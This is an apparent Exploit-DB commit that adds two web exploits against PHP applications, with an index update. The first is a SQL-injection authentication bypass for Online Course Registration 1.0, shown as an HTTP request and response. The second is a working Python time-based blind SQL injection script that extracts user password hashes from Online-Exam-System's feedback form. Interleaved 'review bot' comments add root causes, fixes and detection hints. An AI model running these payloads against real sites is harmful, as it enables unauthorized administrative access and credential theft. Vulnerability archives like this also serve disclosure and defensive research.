DB: 2020-06-06

2 changes to exploits/shellcodes

Online Course Registration 1.0 - Authentication Bypass
Online-Exam-System 2015 - 'feedback' SQL Injection
Offensive Security 2020-06-06 05:01:55 +00:00
parent 533f33f3f4
commit d0531a5e12
3 changed files with 76 additions and 0 deletions


@ -0,0 +1,40 @@
# Exploit Title: Online Course Registration 1.0 - Authentication Bypass
# Google Dork: N/A
# Date: 2020-06-05
# Exploit Author: BKpatron
# Vendor Homepage: https://www.sourcecodester.com/php/14251/online-course-registration.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-course-registration.zip
# Version: v1.0
# Tested on: Win 10
# CVE: N/A
# my website: bkpatron.com
# Vulnerability: Attacker can bypass login page and access to dashboard page
# vulnerable file : admin/index.php
# Parameter & Payload: '=''or'
# Proof of Concept:
http://localhost/Online%20Course%20Registration/admin/index.php
POST /Online%20Course%20Registration/admin/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Referer: http://localhost/Online%20Course%20Registration/admin/index.php
Cookie: PHPSESSID=il6a0lzq8ndo1bb4672rd7cr3m
Connection: keep-alive
Upgrade-Insecure-Requests: 1
username=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=: undefined
HTTP/1.1 302 Found
Date: Thu, 04 Jun 2020 20:04:27 GMT
Server: Apache/2.4.39 (Win64) PHP/7.3.5
X-Powered-By: PHP/7.3.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
location: http://localhost/Online Course Registration/admin/change-password.php
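Review bot: The entry is titled an authentication bypass, but the header never names the root cause, which the proof of concept shows to be SQL injection: the same quote-and-`or` string in both `username` and `password` is answered with a 302 to admin/change-password.php. A header line such as `# Root cause: SQL injection in the login query of admin/index.php (username and password)` would make the record searchable by vulnerability class. The login code is not shown here, so this part is inferred: it presumably interpolates both POST fields into one SELECT, and the fix is a prepared statement plus verifying a stored password hash in PHP rather than inside the query. The trailing `: undefined` on the request body line looks like a capture artifact, since the declared Content-Length of 61 covers the body only up to `submit=`.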

34
exploits/php/webapps/48560.py Executable file

@ -0,0 +1,34 @@
# Exploit Title: Online-Exam-System 2015 - 'feedback' SQL Injection
# Date: 2020-06-04
# Exploit Author: Gus Ralph
# Vendor Homepage: https://github.com/sunnygkp10/
# Software Link: https://github.com/sunnygkp10/Online-Exam-System-.git
# Affected Version: 2015
# Tested on: Ubuntu
# CVE : N/A
import requests, string, time
from sys import stdout
URL = raw_input("Please enter the URL to attack (example http://localhost/Online-Exam-System/)\n")
payload = "feedback' , '2020-06-04', '01:58:10am'),('1337','test','test@test.com','test',(SELECT CASE WHEN (SELECT EXISTS(SELECT password FROM user WHERE password REGEXP BINARY '^"
payload2 = ".*'))=1 THEN sleep(5) ELSE sleep(0) END),'2020-06-04', '01:58:10am'); -- -"
so_far = hash = ""
while True:
for i in string.digits + string.ascii_lowercase:
so_far = hash + i
payload_to_send = payload + str(so_far) + payload2
data = {"name":"test","email":"test@test.com","subject":"test","feedback":payload_to_send}
start = time.time()
r = requests.post(URL + "feed.php", data = data)
request_time = time.time() - start
if request_time > 5:
hash += i
stdout.write(i)
stdout.flush()
break
if len(hash) > 31:
stdout.write("\n")
print "Hash found: " + hash
break
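Review bot: The header of 48560.py names the injectable parameter but records neither the root cause nor a fix, and the script's side effects on the target database go unmentioned. Judging by the payload, which closes a quoted value and appends a second tuple to a VALUES list, feed.php presumably concatenates the `feedback` POST field into an INSERT; a header line such as `# Root cause: feed.php builds its INSERT from unescaped POST fields; fix: prepared statements` would capture that, and it is worth stating that each request appears to leave rows in the feedback table. The loop stops at 32 characters of `user.password` drawn from digits and lowercase letters, which suggests unsalted MD5 storage and deserves its own line as a second finding. For detection, each probe is a POST to feed.php carrying `sleep(` and `REGEXP BINARY` in the form body, and requests with a matching guess are answered about five seconds late.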


@ -42785,3 +42785,5 @@ id,file,description,date,author,type,platform,port
48556,exploits/hardware/webapps/48556.txt,"Secure Computing SnapGear Management Console SG560 3.1.5 - Arbitrary File Read",2020-06-04,LiquidWorm,webapps,hardware,
48557,exploits/multiple/webapps/48557.py,"Cayin Signage Media Player 3.0 - Remote Command Injection (root)",2020-06-04,LiquidWorm,webapps,multiple,
48558,exploits/multiple/webapps/48558.txt,"Cayin Digital Signage System xPost 2.5 - Remote Command Injection",2020-06-04,LiquidWorm,webapps,multiple,
48559,exploits/php/webapps/48559.txt,"Online Course Registration 1.0 - Authentication Bypass",2020-06-05,BKpatron,webapps,php,
48560,exploits/php/webapps/48560.py,"Online-Exam-System 2015 - 'feedback' SQL Injection",2020-06-05,"Gus Ralph",webapps,php,
